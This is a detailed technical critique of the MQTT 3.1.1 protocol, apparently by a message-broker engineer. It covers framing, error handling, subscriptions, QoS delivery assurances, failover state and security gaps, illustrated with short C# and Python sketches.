One mainstream use-case for MQTT is telemetry ingestion (as it is the "MQ telemetry transport", after all). That means the client just needs to know two gestures: connect/connack as discussed, and publish.

The publish packet carries a number of flags (that I'll get to later), the topic name, and a packet-identifier whose presence depends on the flags. That information is followed by a free-form binary payload, whose length is determined by subtracting the length of the topic name, including its own leading length indicator, and the length of the packet-identifier from the remaining length included in the fixed header.
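In code, carving the payload out of a publish packet comes down to this:

```csharp
static class PublishFraming
{
    // The payload is whatever is left of the remaining length after the
    // topic name (with its two-byte length prefix) and, for QoS 1 and 2
    // only, the two-byte packet identifier.
    public static int PayloadLength(int remainingLength, int topicNameByteCount, int qos)
    {
        int variableHeaderLength = 2 + topicNameByteCount  // prefix + topic
                                 + (qos > 0 ? 2 : 0);      // packet identifier
        return remainingLength - variableHeaderLength;
    }
}
```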

As a result, you find two subsequent length indicator fields (remaining length and topic name length) on the wire that are interrelated as you decode them, and that's where MQTT gets caught up in its faked-up "header" model, and in its protocol-manifested desire to know the length of the message and to read the entirety of the message into memory before beginning to process it.

That's the opposite of HTTP, which – with some success – uses a model allowing incremental discovery of the message that also permits payload chunking. It's also different from AMQP or WebSockets, which both have a cleanly layered notion of framing, where each frame has a frame-length preamble before there's any consideration of what's in it, so the transport stack can pull a frame off the network without having to communicate any information discovered in the process to an upper layer. Even XMPP, whose XML-fragment based framing model I personally don't like much, allows the network reader to pull a frame off the network without considering the contents other than counting the balance of elements and attributes. The MQTT design throws a bit of significant protocol right in front of the framing and therefore introduces unnecessary coupling.

The great sin of MQTT with regards to payload is that it is completely oblivious to payload. Not only does MQTT not define a payload format as AMQP or XMPP or JSON-over-WebSocket do, it doesn't even provide negotiable or at least discoverable content-types or encodings as HTTP and AMQP do. On the subscriber side of an MQTT communication path you just have to know what's in that byte array. There is no facility to tell you what the content-type or content-encoding might be. This is a protocol in active standardization in the year 2014. It's unbelievable.

As a consequence, stating that a system supports MQTT can't be a complete statement. You really have to say "mqtt+bson", "mqtt+json", "mqtt+protobuf", or whatever you use as payload encoding, because the protocol gives no indication and, yet, payload and framing are necessarily coupled when you're in the publisher or consumer role. A broker can be oblivious to the payload; its clients can't be. The MQTT specification isn't showing much consideration for their needs.

Errors

Amazingly, MQTT does manage to take it up a notch from unbelievable to inexcusable when you look at the error handling strategy.

MQTT's error handling model for everything, from client-side protocol violations to intermittent error conditions where a server can't flush a message to disk for whatever reason, is for the server to drop the network connection. The rule is that whenever something happens that's unexpected and not written down in the spec as the blessed one way, the server will cut the cord, with no explanation.

The sole exception from that rule is the connect/connack handshake where connack does indeed define a set of error codes that explain why a connection cannot be established. However, should you be making the mistake of sending "connect" and have one of the header flags wrong, the server will (must) cut the socket even before replying with "connack".
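For reference, here is the complete set of connack return codes in MQTT 3.1.1, the one place in the protocol where an error gets an explanation:

```csharp
// The connack return codes defined in [MQTT 3.2.2.3]; every other error
// in the protocol is expressed by dropping the connection.
enum ConnackReturnCode : byte
{
    Accepted = 0x00,
    UnacceptableProtocolVersion = 0x01,
    IdentifierRejected = 0x02,
    ServerUnavailable = 0x03,
    BadUserNameOrPassword = 0x04,
    NotAuthorized = 0x05
}
```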

This toddler-like attitude of MQTT towards error conditions instantly disqualifies it as a serious protocol choice for practically all use-cases where predictability and reliability matter; it makes the protocol hard to debug; and it actively sabotages MQTT's goal of providing minimal wire-footprint.

The strategy is really something to behold: for an application field where wireless communication with significant traffic contention and packet loss and network-roaming clients with frequent disconnects due to cell-tower hopping will be the norm, MQTT indicates errors, including those caused by transient conditions in the broker, by making them indistinguishable from network-infrastructure imposed error conditions and absolutely impossible to diagnose.

The strategy also demonstrates MQTT's inherent obliviousness of the wire-footprint and latency effects of adding security to the transport layer. The protocol is greedy to the single byte, but in the case where the server's storage layer were having the hiccups for a minute (and that happens in a distributed system), the protocol is perfectly happy to toss out a negotiated TLS channel with the socket at the bottom of it, and force the client to restart into a multi-hop handshake that may include, depending on TLS authentication mode, the mutual exchange of certificates, potentially weighing in at 5-10 kBytes per reconnection attempt over networks with a few hundred milliseconds of base roundtrip latency. Because the server has the hiccups. The client and the client's metered M2M data plan link are paying for the server having the hiccups.

Anyone with any experience of operating scale-out systems ought to be offended by a design that assumes backend reliability perfection and lays the blame on the client if that assumption cannot be satisfied, with the backend assuming zero responsibility and not even telling the client what's wrong.

In MQTT's error handling model, the client has no way of distinguishing between a weak network link with excessive packet loss, the timeout of a NAT session, a roaming-imposed change of network address causing a socket collapse, or the server having the hiccups. As the client can't tell, its only chance is to aggressively reconnect if it needs to get rid of data, and thus it will run up the phone bill specifically when the communication infrastructure is not at fault.

I'll be revisiting the error handling aspect a little later when we get to reliability.

Subscriptions

The way you receive messages from an MQTT broker is by creating a subscription. MQTT subscriptions are different from those in many other brokers in that they set up both a filter-based delivery route and a message solicitation gesture at the same time, and that the message solicitation gesture is active for as long as the subscription is active.

In other words, you tell the broker what you're interested in, and then you tell it that you want to get any message fitting that criterion as it becomes available, without any further action. MQTT implements a "solicit push" pattern; the client connects and establishes a delivery route for messages and either creates a new subscription or reuses an established subscription set up during a previous session with the same client-id. If any messages are available at the time of connection they'll be instantly delivered, and further messages will be delivered into the existing connection to clients with a matching subscription as they become available.

The push model is great since it relieves you of having to pull individual messages or batches of messages; there is no need for a "receive" gesture. There is no "polling" as some people might put it, and the absence of that is something many people seem to find an attractive feature.

The flipside is that while there is no explicit need to pull, there's now also no ability to control the flow of messages coming up the pipe to the client other than refusing to read from the socket. That's not a problem for scenarios where the client is performing a singular task or several tasks that do not take any significant work like displaying a line in a chat window.

Not having any flow control can get fairly dicey when there is significant work to do for processing a message, and there might be several different subsystems on the receiving end of the MQTT connection where the work differs. As MQTT offers no flow control capability whatsoever, you can thus get into the situation where, say, a commercial vehicle telematics box is subscribed to traffic information that can just be quickly appended to a list and, simultaneously, to messages that must be shown to the driver and explicitly acknowledged. With that, you're multiplexing two streams of messages, of which one you can potentially process at several thousand messages per second, while for the other one you really depend on how much attention the driver is willing to pay. Mind that there's also no message-level time-to-live information at the MQTT level that you could lean on for how long the sender is willing to wait for a reply.

In a situation like this, the required strategy with MQTT is to rip everything down from the wire as fast as you can and process it locally or store it locally, because of the absence of flow control. You can also, to some degree, leave in-flight messages unacknowledged, but whether that's possible depends on the ordering requirements.

If there's any data stream over the connection requiring in-order delivery, then that automatically extends to all streams. Generally, the flow control issue will force messages to be flagged as consumed towards the broker, even with the at-least-once and exactly-once delivery assurance models (next section) when you have done nothing to process the message, because you need to keep getting at the messages coming up behind the one you're pulling off. MQTT lacks both flow-control and multiplexing.
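Here's a sketch of what that drain-and-buffer strategy forces onto the client; the topic convention, queue bound, and dispatch rule are made-up application choices that MQTT gives no help with:

```csharp
using System.Collections.Concurrent;

class InboundDispatcher
{
    // cheap stream: just collect, nothing waits on it
    readonly ConcurrentQueue<byte[]> trafficInfo = new ConcurrentQueue<byte[]>();

    // expensive stream: bounded, because the driver reads at human speed
    readonly BlockingCollection<byte[]> driverMessages =
        new BlockingCollection<byte[]>(boundedCapacity: 1000);

    public void OnPublishReceived(string topic, byte[] payload)
    {
        if (topic.StartsWith("traffic/"))
            trafficInfo.Enqueue(payload);   // append and move on
        else
            driverMessages.Add(payload);    // blocks when full, which stalls
                                            // the single socket reader for
                                            // ALL multiplexed streams
    }
}
```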

The way AMQP deals with this is that it allows multiplexing of links through a single connection and has a credit-based message solicitation model, meaning that you can ask for a single message on one link and a quasi-unbounded sequence of messages on another link and thus can get "pull" and "solicit push" at the same time.

The maximum number of messages that can be kept in flight is limited by the 2-byte packet-identifier. If you wanted to maintain a high-speed transfer link with individual messages across a high-bandwidth, but high-latency network, either with very largely scaled-up TCP receive buffers or using alternate transports like UDT, MQTT will start tripping on itself at 64K in-flight messages pending acknowledgment on QoS 1 or better. With a 4 byte payload and Nagling, MQTT would have you hit that point just past 1MByte of wire footprint; 500ms roundtrip at 20 Mbit/sec.
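A sketch of a packet-identifier allocator running into that 2-byte ceiling; once every identifier is outstanding, the sender has to stall on the protocol rather than on the network:

```csharp
using System.Collections.Generic;

class PacketIdAllocator
{
    readonly HashSet<ushort> inFlight = new HashSet<ushort>();
    ushort next = 1;                       // 0 is not a valid packet identifier

    public bool TryAllocate(out ushort packetId)
    {
        if (inFlight.Count >= 65535)       // all identifiers await acknowledgment
        {
            packetId = 0;
            return false;                  // nothing left to send with: stall
        }
        do
        {
            if (next == 0) next = 1;       // skip 0 on ushort wraparound
            packetId = next++;
        }
        while (!inFlight.Add(packetId));   // skip ids still pending an ack
        return true;
    }

    public void Release(ushort packetId)
    {
        inFlight.Remove(packetId);         // acknowledgment received
    }
}
```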

State Management

Subscriptions must be held by the broker as long as the client maintains a session, or until the client tells the broker to clear out the session [MQTT 3.1.2.4] and nuke away all context established for it. What maintaining a session means is fairly ambiguous in the specification, which states that "some Sessions last only as long as the Network Connection, others can span multiple consecutive Network Connections between a Client and a Server".

The ambiguity this creates is fairly interesting when taken together with the error handling strategy.

Is the server entitled to nuke all subscriptions when there is – let's say – a storage failover, while the client is connected and happens to send a message and that message can't be stored at that second? Since the server's only way to communicate errors is to kill the connection, and the connection may represent the session boundary, it is legitimate for the server to throw all subscriptions out at that point, as per the specification. That does, actually, mean that the server is completely entitled to forget about all subscriptions with any sort of excuse. "I don't feel like it right now" is a perfectly fine transient condition to nuke the connection and drop everything.

Thus, following the words of the spec, the only way for a client to reliably reestablish its subscription context is to set the "clear session" flag at every reconnection attempt and reissue the "subscribe" packets. And since it can't tell whether the server dropped the connection on purpose or the connection dropped due to some networking condition, there's really no good way to optimize the behavior. Better safe than sorry. Turns out, reissuing a receive gesture is exactly what you'd do on AMQP as well, and also what you'd do with HTTP long-polling.
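A sketch of that better-safe-than-sorry strategy; IMqttClient and Subscription are hypothetical stand-ins for whatever client library is in use:

```csharp
using System.Collections.Generic;
using System.Threading.Tasks;

interface IMqttClient
{
    Task Connect(bool cleanSession);
    Task Subscribe(string topicFilter, int qos);
}

class Subscription
{
    public string TopicFilter;
    public int QoS;
}

static class ReconnectStrategy
{
    // Always ask for a clean session and replay every subscribe packet,
    // because the client cannot tell why the previous connection died.
    public static async Task Reconnect(IMqttClient client,
                                       IEnumerable<Subscription> subscriptions)
    {
        await client.Connect(cleanSession: true);    // throw away server state
        foreach (var subscription in subscriptions)  // reestablish every route
            await client.Subscribe(subscription.TopicFilter, subscription.QoS);
    }
}
```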

The downside of resetting the subscription is, of course, that the subscription's state with regard to the message stream gets lost, and you end up with an online-only subscription model with no offline capability as the subscription doesn't exist while offline. So the exact opposite strategy is to never issue a "subscribe" gesture, never set the clear session flag, and just go with the assumption that the "subscribe" gesture has been established at some point in the past. You don't subscribe; the subscription is just there. That gets you online/offline capability. Using "subscribe" on the wire does not. I'll revisit this at the end of this article.

The concept of "Will" is oddly not suffering from the same ambiguity issues. The intent here is straightforward in allowing the client to park a message that says "I'm no longer here, because I'm network-unreachable", which is a way to implement presence functionality, i.e. turn the "is present" flag off. For "Will", the rules are very clear in that it's tied to the network connection.

Resource Governance

Compared to MQTT 3.1, the OASIS MQTT 3.1.1 spec clarifies [MQTT 4.7.3] that topics are not generally dynamic and may be predefined. It also clarifies that there "may be a security component that authorizes access to certain topics". That's a more than necessary addition to the specification, especially when considering the existence of the "retain" flag. What the spec also ought to mention is that the way to express an authorization failure is to disconnect the client and that the client won't ever know why that happened.

The retain flag [MQTT 3.3.1.3] requires the server to retain the given message, of whatever size, on the topic, so that it will be delivered to "any future subscribers when subscriptions match the topic name". Any subsequent message with that flag will replace the existing message with "retain".

Dynamic topics in conjunction with this retention model are a nice puzzle to solve, because a single publisher client can stuff a server with messages on randomly named topics that nobody will ever pick up, and the server can't effectively defend against that, other than not offering dynamic topics or tracking dynamic topic use with a per-user (not per client-identifier) quota.

If authorization were defined, the retention model would likely require a special level of authorization beyond "send" permission, since the "retain" message is a shared resource that ought to have special protection; a client's set "retain" message ought to have a guarding mechanism against undesired overrides by some other, lesser privileged client. This is similar to the permission to allow creating sticky posts in web forums, which usually requires administrative permission.

I've chosen to not implement support for "retain" not only because of resource governance and authorization concerns that will have to be solved, but also because it requires immediate broker support, and will require special behavior for all other protocols on a multi-protocol broker. "Retain" is conceptually interesting, but I think I would like an explicit broker feature that works cleanly across protocols even more; some (any) explicit customer use-case demand for the capability would also help bumping the priority up.

Delivery Assurances

Next we'll take a look at delivery assurances. MQTT defines 3 levels of "Quality of Service". Level 0 provides a best-effort, "at most once" message delivery assurance. Level 1 aims to provide an "at least once" message delivery assurance, and Level 2 even an "exactly once" delivery assurance.

Unfortunately, MQTT defines this assurance model only for the publish gesture and not for its own, inherent operations, which is a good source of confusion. For instance, if you're creating a subscription, and creating the subscription succeeds while the route to the client collapses (let's say due to mobile national roaming, switching towers) just as the server is sending the "suback" response, then it's not unlikely that the client will come back to reconnect to some other server node before the current server node even knows what's going on, while that node is still waiting for the socket to collapse, hanging on the timeout for the pending response. At that point, does a subscription exist for the client in spite of the client not having received "suback"?

It's not clear what the correct behavior ought to be. The client could interpret the disconnection as a network failure occurring before or after "subscribe" could be delivered, or as a failure to establish the subscription due to any transient server condition, such as an ongoing server node failover or any other reason. It can't know. The server node will look to send the "suback" command back to the client, but there is no rule about what happens to the subscription when that fails. "Suback" is (implicitly) a QoS 0 message, and it is therefore inherently acceptable to lose it, and thus the subscription probably ought to stand. The client can't distinguish these cases due to the broken error handling model and will be in doubt about whether the subscription exists.

That means the client is forced to retry under any such circumstances. The specification already anticipates this by making subscriptions effectively idempotent: a subscribe command matching an existing subscription must replace that subscription with a new one, and the message flow must not be interrupted.
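What that forced retry looks like from the client side can be sketched roughly like this; the connection object and its send_packet/wait_for/reconnect methods are illustrative placeholders, not any real MQTT library API:

    # Sketch: the client cannot tell whether a lost connection swallowed
    # "subscribe" or only "suback", so it must re-issue the subscribe on
    # every reconnect. The conn object and its methods are placeholders.
    def ensure_subscribed(conn, topic_filter, qos, packet_id):
        while True:
            conn.send_packet("SUBSCRIBE", packet_id=packet_id,
                             topic_filter=topic_filter, qos=qos)
            try:
                # subscription confirmed if and when suback arrives
                return conn.wait_for("SUBACK", packet_id=packet_id, timeout=30)
            except ConnectionError:
                # in doubt: retry; the spec makes a matching re-subscribe
                # replace the existing subscription without message loss
                conn = conn.reconnect()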

This case shows how MQTT's lack of separation between the message transfer model on one side and overlaid semantics on the other is quite problematic. "subscribe" and "suback" ought to be messages that are both delivered with "at least once" assurance if the subscription were indeed held durably. Thus, if a subscription has been established as a connection collapses, "suback" would instead be delivered on the reestablished connection. MQTT's reliable payload message transfer model realized with "publish" and related acknowledgements isn't available for the MQTT management operations and that hurts their reliability semantics.

The "fire and forget" QoS level 0 is helped by the client. The client will try once and if it fails to get the message to the server, for whatever reason, it will instantly give up. That ensures "at most once" by ways of client cooperation with the rule, but there's no governance opportunity for the server.

The QoS 1 "at least once" model with publish and puback provides a reasonable level of assurance to the client about whether a message has been accepted by the broker when puback gets back through. Until the client has received puback, it must hold on to any sent messages and if there is any failure condition, the client will set the "dup" flag [MQTT 3.3.1.1] in a retry copy of the message and send again. The presence of the "dup" flag allows the server to determine that this is a retry. If the server has already sent puback for a given packet identifier, it must treat the message as a new publication [MQTT 4.3.2-2].

The "dup" flag is a bit of a mystery. Personally, I don't know what to do with it. The spec is clear that I can't rely on having seen a previous package with "dup" set to 0 – which is logical as the client can have run into a local network condition as it tried to put the first packet on the wire. It escapes me what I do with the knowledge that the client has retried sending this packet at least once (I may be looking at the umpteenth resend) and the specification is no help. It states that a set "dup" flag indicates a retransmission, but there's no rule that depends on it. This smells like protocol baggage.

The QoS 2 "exactly once" assurance is the assurance level that I, so far, chose to not implement, largely because I have serious doubts about it being possible to provide "exactly once" as an end-to-end assurance in a scale-out messaging system, and if the assurance can't be given end-to-end it makes little sense to provide it on any of the legs.

Without going into too much detail, there are a range of edge-case error conditions that can occur in large high-throughput, multi-node broker systems where you'll favor duplicating a message over potentially losing it completely. That's especially true in cases where the gateway and the broker run on different nodes, and the gateway hands off a message straight into a broker failover situation. In that case, the broker might just get the message off to disk but doesn't get a chance to report that fact back to the gateway. In traditional transactional systems, you would span a transaction from the client over to the message store to ensure consensus on the outcome of the operation so that the broker won't make the stored message available for consumption until the client permits it, but many contemporary scale-out broker systems can't and won't subject their stores to transaction-scope control by untrusted clients for availability, reliability, and security reasons.

MQTT tries to mimic that traditional transaction model similar to how Azure Service Bus's proprietary SBMP protocol (which is being phased out in favor of AMQP) mimics it. The message gets published with publish and the server stores and holds it. The server then confirms the receipt with pubrec, which establishes consensus between client and server that the server has the message safely in hand. The client then issues pubrel to permit the server to publish the message, which is confirmed by the server with pubcomp. The pubrel/pubcomp exchange is a QoS 1 exchange, meaning the client will repeatedly reissue the pubrel message until it receives a pubcomp confirmation. Oddly, the client isn't allowed to set the "dup" flag on these retries [MQTT 3.6.1], which underlines my suspicion that the "dup" flag is largely protocol fluff or someone's implementation detail seeping out into the spec.
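As a rough server-side sketch of that four-step exchange, with the store/release hooks standing in for whatever the broker backend actually provides:

    # Server-side sketch of the QoS 2 exchange; store_locked/release are
    # illustrative placeholders, not any particular broker's API.
    def on_qos2_packet(packet, session, broker):
        if packet.type == "PUBLISH":
            # step 1/2: store the message under lock, confirm receipt
            broker.store_locked(session.client_id, packet.packet_id, packet.payload)
            session.send("PUBREC", packet.packet_id)
        elif packet.type == "PUBREL":
            # step 3/4: client releases; only now may the broker forward.
            # pubrel may be a retry, so release must be idempotent.
            broker.release(session.client_id, packet.packet_id)
            session.send("PUBCOMP", packet.packet_id)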

MQTT's QoS 2 prescribed exchange will, if successful, achieve transferring exactly one message copy to the server. The pattern is a well-traveled path. It does not, however, aim to ensure that exactly-once delivery is achieved end-to-end, with the publisher knowing that delivery has been successful.

The reason I didn't implement QoS 2 is that I would have to make a transactional scale-out store to hold on to these messages that would have to live outside of the actual broker to keep the promise I make in pubrec. Without deep integration with the broker message store, I would actually just move the problem by one layer and might still only get "at least once" assurance. I explain this more in the next section.

To make the model solid, the broker backend behind an MQTT gateway must immediately support the transaction gestures on its store, meaning the broker would have to store and lock messages handed to it, and then promise not to forward them until a second gesture clears them for forwarding. There's an interesting abuse vector here in that you could potentially stuff a server with messages and never release them. The specification's section on ordering [MQTT 4.6] cites an undefined "in-flight window" (which appears to be an implementation detail of IBM's MicroBroker that has no place in an OASIS spec) in a non-normative comment and speaks about how restricting in-flight messages will address this.

Data Retention and Failover

Since I'm looking at MQTT from the perspective of building a scaled-out broker infrastructure, the reliability semantics of the protocol are inseparable from the failover behavior, as failover – meaning that a server node shuts down for any reason and another node kicks in to replace it – is how any large scale system stays available.

On failover, the first interesting aspect is the maintenance of the session-related state across all frontends. MQTT's state-management semantics work out to demand either a "CP" state management backplane ("CP" means consistency-biased per the CAP theorem) or no cross-node state management, at all.

Directly copying from the specification [MQTT 3.1.2.4], the session state on the server consists of the following:

  • The existence of a Session, even if the rest of the Session state is empty.
  • The Client's subscriptions.
  • QoS 1 and QoS 2 messages which have been sent to the Client, but have not been completely acknowledged.
  • QoS 1 and QoS 2 messages pending transmission to the Client.
  • QoS 2 messages which have been received from the Client, but have not been completely acknowledged.
  • Optionally, QoS 0 messages pending transmission to the Client.

The rules on state retention [MQTT 4.1] are disappointingly noncommittal for a specification that imposes so many state retention obligations on a server. Session state (and therefore the session) must be maintained for as long as the network connection exists, but beyond that it can be liberally discarded based on time, administrator action, because arbitrary stuff goes wrong (state corruption), because of resource constraints, or a full moon. It's compliant to shout "error!" and throw all state away and the client will have to cope with it.

Sadly, this noncommittal attitude of the specification also throws all QoS 1 and QoS 2 assurances straight out of the window. A client that has established a subscription on which it expects QoS 2 message delivery of presumably important data on a topic, and that gets disconnected for any reason (including the server having the hiccups) gets absolutely no assurance at the state retention layer that either the subscription or the in-flight QoS 2 messages will be retained and held available for a reconnect.

Mind that I can't let the excuse "it depends on what the implementation does" count. Either the specification provides me with watertight assurances or it does not. MQTT does not. It doesn't even try.

It's wishy-washy with "some" and "others" (MQTT 1.2, "Some Sessions last only as long as the Network Connection, others can span multiple consecutive Network Connections between a Client and a Server.") or "can" (MQTT 3.1.2.4 "The Client and Server can store Session state to enable reliable messaging to continue across a sequence of Network Connections"). There's no MUST or even just SHOULD with regards to retention rules.

But let's assume the spec were more assertive, and let's go through the session state items that the protocol asks to retain for the duration of a session. Let that be until the client disconnects or until a timeout that is known to both parties a priori elapses (that's my alternate definition, not the spec's). I've taken the liberty of reordering the item list from the spec for a better flow of explanation.

For the following discussion I will assume that the node running the MQTT broker will be one of at least two in a farm and one of them fails (assume an instant death due to a power-supply failure) and the other needs to kick in as the failover secondary, with the client instantly reconnecting to the other node.

  • The existence of a Session, even if the rest of the Session state is empty – A session exists when there's an ongoing relationship with a particular client-id. The fact that there is a session must be retained, and all subsequent items are presumably anchored on that session. The session is [MQTT 3.1.2.4] "identified by the Client identifier", so there must only be one. In fact, the client-identifier really ought to be called session-identifier, because using a true client identifier has fairly negative security implications, as I'll discuss in the next section. If session state has to be retained across connections and server nodes in a failover situation, the immediate consequence of this most basic rule is that you cannot return connack (which confirms establishing or recovering a session) until all server nodes have access to a replica of this fact. The spec doesn't say that.
  • The Client's subscriptions – Client subscriptions are subject to the same considerations, and I already touched on the in-doubt issues with suback in the previous section. If subscriptions ought to survive network connections and they have QoS 1 or QoS 2 assurances attached, the record of their existence must be known by all server nodes before suback is returned (see the sketch following this list). The spec doesn't say that either. I'm cutting the spec some slack for QoS 0, because those subscriptions could indeed be replicated in an eventually consistent manner, as fumbling some messages is inherently acceptable while the replica propagates.
  • QoS 1 and QoS 2 messages pending transmission to the Client – Since we presumably have a broker with peek-lock and server-side cursor support for subscriptions backing the MQTT implementation, this is a straightforward requirement to fulfill as it means that messages available on the subscription but not yet delivered will be retained. Brokers do that.
  • Optionally, QoS 0 messages pending transmission to the Client – see above.
  • QoS 1 and QoS 2 messages which have been sent to the Client, but have not been completely acknowledged – Here it gets very interesting, because we're required to log the in-flight client interactions on a per-session basis in a way that lets any server node in the farm instantly take over redelivery. For QoS 1, and with the protocol implementation backed by a broker, this is not all that hard if the broker counts delivery attempts so that you can set the "dup" flag correctly (which is required for protocol compliance despite serving no purpose I can see). For QoS 2, being failover-safe practically means that you will either have to distribute the fact of a pending pubrel throughout the farm on a per-session basis before you send it, and also garbage-collect that data after you receive pubcomp, or – easier – have to run pubrel through the backend broker, since you need to remember pending deliveries of that message just as you do for the "publish" message per se. The tradeoff for "easier" is that you're running edge-protocol-specific control messages through the backend broker.
  • QoS 2 messages which have been received from the Client, but have not been completely acknowledged – This requirement is quite tough in a scale-out failover model unless you immediately own the broker store or the broker allows for a model of queuing messages under a lock. You will have to retain all these messages received via "publish" for access by all (secondary) nodes across the farm before you return "pubrec", but without having them committed into (or released from) the broker for delivery until the matching "pubrel" is received.

I didn't implement QoS 2 for the time being, since I can't fulfill the last QoS 2 retention requirement with the broker I'm using. Azure Service Bus does indeed support queuing messages under a lock when using transactions, but losing the client and client connection triggers the transaction being abandoned. I'm in the lucky position to be able to ask our broker development team directly for an extension of that capability to allow for a lock that can be explicitly managed, and I might actually do that; this will not, however, solve the replication problem of all potential secondary nodes having to know about that lock at the protocol gateway edge and its association with the client-id and the sequence-id, meaning that in addition to the lock, there's information about the lock that the gateway needs to retain server-side.

MQTT is far from easy to implement if you want to do it correctly, and across more than one server node.

I believe that MQTT specifically suffers from the madness of attempting to provide reliable messaging using a "solicit push" pattern, where the solicitation of an unbounded sequence of messages occurs when the subscription is established, and the delivery of those messages is potentially subject to the QoS 1 or 2 delivery assurances defined in MQTT. With a "pull" based model that separates establishing subscriptions from message solicitation, you can leave delivery resumption control to the client; with MQTT, those two aspects are coupled.

AMQP also supports sophisticated patterns for resumption of links with all in-flight deliveries retained intact, and those are just as hard to do at scale, but it's a perfectly valid option there to have all deliveries fail out and make the clients ask for messages again once they reconnect. "Pull" provides a way to push the in-flight problem out to the clients and makes scale-out scenarios more reliable. HTTP follows the same principle (not having server interactions interdepend is an aspect of REST).

Because of these state management considerations, my particular implementation choice for MQTT is to not implement state retention, at all. Instead, I turn the actual establishment of a per-client subscription into an out-of-band gesture and reinterpret the MQTT "subscribe" gesture to mean receive (or push-me-stuff-while-this-connection-lasts) on that pre-existing backend broker (Topic-) subscription.

That means I'm intentionally coupling all MQTT semantics to particular connections; which also means I can't provide QoS 2, but that's fairly easy to replace with message deduplication on the client, anyway.

That separation also enables an interesting trick that I already alluded to earlier:

If I wanted to save the "subscribe" gesture upon connection for footprint reasons, the pre-existing and decoupled backend subscription will allow me to pretend that "subscribe" has been issued on a previous connection in ancient history. With that model, and if the client never uses the "clean session" flag, I can provide instant "solicit push" on the topic associated with the client with QoS 1 assurances over the existing backend topic; extra "subscribe" gestures are basically ignored.
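Sketched out, the gateway's reinterpretation of "subscribe" is little more than an attach operation; the broker API names here are illustrative:

    # Sketch of my gateway's reinterpretation: "subscribe" creates nothing;
    # it attaches the connection to a backend subscription provisioned out
    # of band. Broker API names are placeholders.
    def on_subscribe(conn, broker, session, packet):
        for topic_filter, requested_qos in packet.subscriptions:
            sub = broker.lookup_subscription(session.client_id, topic_filter)
            if sub is None:
                conn.send("SUBACK", packet.packet_id, return_code=0x80)  # failure
                continue
            granted = min(requested_qos, 1)     # QoS 2 intentionally not offered
            # pump messages from the pre-existing subscription for as long
            # as this connection lasts; nothing survives the connection
            conn.attach_pump(sub, max_qos=granted)
            conn.send("SUBACK", packet.packet_id, return_code=granted)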

Security

MQTT 3.1.1 Section 5 states "As a transport protocol, MQTT is concerned only with message transmission and it is the implementer's responsibility to provide appropriate security features. This is commonly achieved by using TLS", i.e. security is your own problem.

Punting on security doesn't stop the spec authors from including a few pages of mentions of security and even regulation considerations, including references to Sarbanes-Oxley (!), the NIST Cyber Security Framework, and PCI-DSS, all of which MQTT has absolutely nothing to do with or enables in any particular fashion. I find the name-dropping disturbing and I feel like there's an attempt to trick me into believing there are relationships where there are none.

It continues: after mentioning TLS as an option, the security section also notes that "Advanced Encryption Standard [AES] and Data Encryption Standard [DES] are widely adopted" (by the way, DES is also very much broken, thank you) and that "Where TLS is used, SSL Certificates sent from the Client can be used by the Server to authenticate the Client", and goes on name-dropping details of X.509 and TLS for the rest of the section.

The only enlightening part of the MQTT security section is [MQTT 5.4.8] on Detecting Abnormal Behaviors, which enumerates a few actual threats that MQTT implementations ought to be able to monitor and defend themselves against. Unfortunately, this "for example" list is far from complete and doesn't represent any thorough analysis.

The first suggested measure is that "Server implementations might disconnect Clients that breach its security rules" (which is fairly handy as that's how MQTT deals with every error), and the second measure is to implement a dynamic block list based on identifiers such as IP address or Client Identifier or to punt the problem up to the firewall in a similar fashion. That's all reasonable advice for any network protocol.
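A dynamic block list of that sort is simple enough to sketch; the threshold, window, and penalty values here are, of course, illustrative:

    import time

    # Sketch of the suggested dynamic block list, keyed by IP address or
    # Client Identifier; all limits are illustrative.
    class DynamicBlockList:
        def __init__(self, threshold=5, window=60.0, penalty=300.0):
            self.threshold, self.window, self.penalty = threshold, window, penalty
            self.failures = {}       # key -> recent failure timestamps
            self.blocked_until = {}  # key -> time before which to refuse

        def record_failure(self, key):
            now = time.monotonic()
            recent = [t for t in self.failures.get(key, []) if now - t < self.window]
            recent.append(now)
            self.failures[key] = recent
            if len(recent) >= self.threshold:
                self.blocked_until[key] = now + self.penalty

        def is_blocked(self, key):
            return time.monotonic() < self.blocked_until.get(key, 0.0)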

Remember: "It is the implementer's responsibility to provide appropriate security features". The problem is that if there is no security, there is no solution; in no commercial environment. And without having a well-defined security model, there is no interoperability.

There are some pretty evil threat vectors looming around MQTT that the specification doesn't mention.

The gravest mistake in the specification is that it fails to mandate that the Client Identifier, and therefore the associated session state, MUST be tied to the authenticated client initiating a session, meaning that a Client Identifier MUST only be used by the authenticated client while such a session exists.

Without this rule, which I'm providing here, any client with access to the server that has knowledge of an existing Client-Identifier can walk up and steal the session when the owning client happens to be disconnected for any reason, which obviously includes, as we know, transient server error conditions for which MQTT's error model is to disconnect the client.

Naming the Client-Identifier what it is makes this threat fairly real, as it suggests a fixed association between the client instance and the server. If MQTT were implemented in a device that holds an extractable credential (username/password or certificate) and the Client Identifier were chosen to be some obvious identifier such as the device's serial number, taking ownership of one device would potentially enable an attacker to hijack all sessions on that server. Hijacking a session includes taking over all previously established subscriptions, which means that even if there were an authorization model for Topics enforced during "subscribe", this approach would allow the attacker to bypass the authorization boundary.

If the identifier were named Session-Identifier, implementers would more likely lean toward making it an ephemeral and quasi-random value (like a GUID), and that's much harder to guess.
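The missing rule is cheap to state in code: bind the Client Identifier to the authenticated identity that creates the session and refuse any later takeover by a different identity. A sketch, with the in-memory dict standing in for whatever session store the server actually uses:

    # Sketch of the missing rule: a Client Identifier is bound to the
    # authenticated identity that created the session; nobody else gets
    # to resume it.
    sessions = {}   # client identifier -> owning authenticated identity

    def on_connect(client_id, authenticated_user):
        owner = sessions.setdefault(client_id, authenticated_user)
        if owner != authenticated_user:
            # someone else's session: refuse instead of silently handing
            # over subscriptions and queued messages to the newcomer
            raise PermissionError("client identifier is bound to another identity")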

Conclusion

For the last 7 years I've been involved in shipping one of the biggest, if not the biggest, multi-tenant, multi-datacenter, transactional, cloud-based message brokers in the world, with several tens of thousands of concurrent tenants across nearly 20 global datacenter locations: Microsoft Azure Service Bus.

Do I have a conflict of interest debating a pet protocol of one of our competitors? Maybe; you'll be the judge of whether this analysis is biased. If you ask people who know me personally they'll tell you that I will call a spade a spade.

I very strongly believe that MQTT 3.1.1 cannot be implemented correctly at the scale we operate while providing anything but QoS 0 assurance, and I'm not comfortable providing anything beyond a QoS 0 assurance for MQTT by the words of the spec, because MQTT 3.1.1 is a fundamentally broken protocol at the present time. I can still provide "at least once", but only with the mentioned workaround of assuming that subscriptions for a given client are established out of band.

